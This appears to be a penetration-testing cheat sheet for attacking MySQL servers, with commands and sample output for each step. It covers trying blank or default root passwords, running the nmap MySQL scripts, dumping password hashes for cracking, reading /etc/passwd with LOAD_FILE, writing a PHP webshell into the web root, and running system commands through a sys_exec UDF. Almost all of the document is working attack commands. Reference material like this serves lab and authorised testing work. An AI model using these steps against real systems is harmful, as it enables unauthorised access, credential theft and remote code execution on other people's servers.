MySQL (3306)
Try default creds
root with no password is common — Default installations
mysql -h $IP -u root -p
(try blank, root, toor)
Example Output
mysql -h 10.10.10.5 -u root
Welcome to the MySQL monitor.
mysql> SHOW DATABASES;
+--------------------+
| Database |
| information_schema |
| wordpress |
| users |
Nmap MySQL scripts
Enum, brute, audit — Quick overview
nmap --script mysql-* -p 3306 $IP
Example Output
nmap --script mysql-* -p 3306 10.10.10.5
| mysql-info:
| Version: 5.7.29
| Salt: abc123
| mysql-enum:
| Valid usernames: root, admin
| Accounts with empty password: root
Enum databases
After login — Find credential tables
SHOW DATABASES;
USE <db>;
SHOW TABLES;
Example Output
mysql> SHOW DATABASES;
+--------------------+
| information_schema |
| mysql |
| webapp |
| secret |
mysql> USE webapp;
mysql> SHOW TABLES;
| users | posts | config |
Dump users/hashes
MySQL user hashes — Crack or pass-the-hash
SELECT user,password FROM mysql.user;
Example Output
SELECT user,authentication_string FROM mysql.user;
+------+-------------------------------------------+
| root | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 |
| admin| *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19 |
(Crack with hashcat -m 300 or john)
Read files (if FILE priv)
Read system files — LFI via database
SELECT LOAD_FILE('/etc/passwd');
Example Output
SELECT LOAD_FILE('/etc/passwd');
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:...
admin:x:1000:1000:Admin User:/home/admin:/bin/bash
Write files (if FILE priv)
Write webshell — RCE if web root is writable
SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php';
Example Output
mysql> SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php';
Query OK, 1 row affected
(Browse to http://10.10.10.5/shell.php?cmd=whoami)
Check UDF for RCE
User Defined Functions — UDF can execute system commands
SELECT * FROM mysql.func;
Example Output
SELECT * FROM mysql.func;
+------+---+----------+----------+
| name | ret| dl | type |
| sys_exec | 0 | lib_mysqludf.so | function |
(UDF already installed = direct command exec)
SELECT sys_exec('whoami');